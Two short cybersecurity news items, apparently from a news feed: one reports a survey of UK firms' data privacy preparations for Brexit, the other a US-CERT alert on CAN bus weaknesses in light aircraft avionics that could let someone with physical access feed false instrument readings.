UK businesses are stepping up their preparations for a potentially tortuous split from the EU, with a third moving some operations to the continent to avoid data privacy regulatory issues, according to new research.

Business process outsourcer Parseq polled 500 decision makers in businesses with 250+ employees about how Brexit might impact their current data privacy obligations.

Although the GDPR is technically transposed into UK law, the country will require an “adequacy decision” from the European Commission to ensure unhindered data flows after it leaves the trading bloc – something that is certainly not guaranteed.

That’s why the vast majority (89%) of firms polled by Parseq said they’d taken proactive measures.

Around a third (35%) said they’d refocused their client base to the UK, while a similar number (32%) had transferred operations to the EU.

Nearly two-fifths (37%) said they have audited data flows to and from the EU and even more (42%) have sought advice from regulator the Information Commissioner’s Office (ICO).

Craig Naylor-Smith, managing director at Parseq, argued that UK firms are currently operating on shifting sands given the lack of clarity over post-Brexit data transfer arrangements.

“The Data Protection Act (2018) transposed the GDPR into UK law, but if the rules in Europe diverge once we leave the EU it could make transferring personal data to and from the continent more difficult — a vital consideration for businesses in our increasingly connected, digital world,” he added.

“With this in mind, it’s encouraging to see so many firms take proactive steps to prepare for the prospect of regulatory changes. However, with an even proportion of firms increasing their European presence and refocusing their position to the UK, it’s clear the best course of action will depend on individual strategies.”

The bottom line is: UK businesses must consider how Brexit could impact data privacy regulations as a matter of urgency, he said.

Categories: Cyber Risk News

US Government Issues Light Aircraft Cyber Alert

Wed, 07/31/2019 - 09:15
US Government Issues Light Aircraft Cyber Alert

The US-CERT has been forced to issue an ICS alert after a security researcher revealed major cybersecurity shortcomings in small aircraft which could enable attackers to cause crashes.

The issues lie with the CAN bus networks, a common feature of automobiles which connect electronic sensors and actuators.

“An attacker with physical access to the aircraft could attach a device to an avionics CAN bus that could be used to inject false data, resulting in incorrect readings in avionic equipment,” the alert noted.

“The researchers have outlined that engine telemetry readings, compass and attitude data, altitude, airspeeds, and angle of attack could all be manipulated to provide false measurements to the pilot. The researchers have further outlined that a pilot relying on instrument readings would be unable to distinguish between false and legitimate readings, which could result in loss of control of the affected aircraft.”

The research itself was carried out by Rapid7’s Patrick Kiley, who is also a pilot. He spotted an over-reliance in the avionics sector on physical security and called for more defense-in-depth.

“Just as football helmets may actually raise the risk of brain injuries, the increased perceived physical security of aircraft may be paradoxically making them more vulnerable to cyber-attack, not less,” he argued in a blog post introducing the research.

“Think about it: if you felt like your internal LAN was totally and completely untouchable by attackers, you probably wouldn't worry much about software patching or password management. Of course, LANs aren't impregnable, and neither are CAN bus networks, so we're worried about this mindset when it comes to avionics security.”

The hope is that, just as greater scrutiny of these systems in the automotive industry has led to steps being taken to mitigate risk, the same can happen in the light aircraft space.

Categories: Cyber Risk News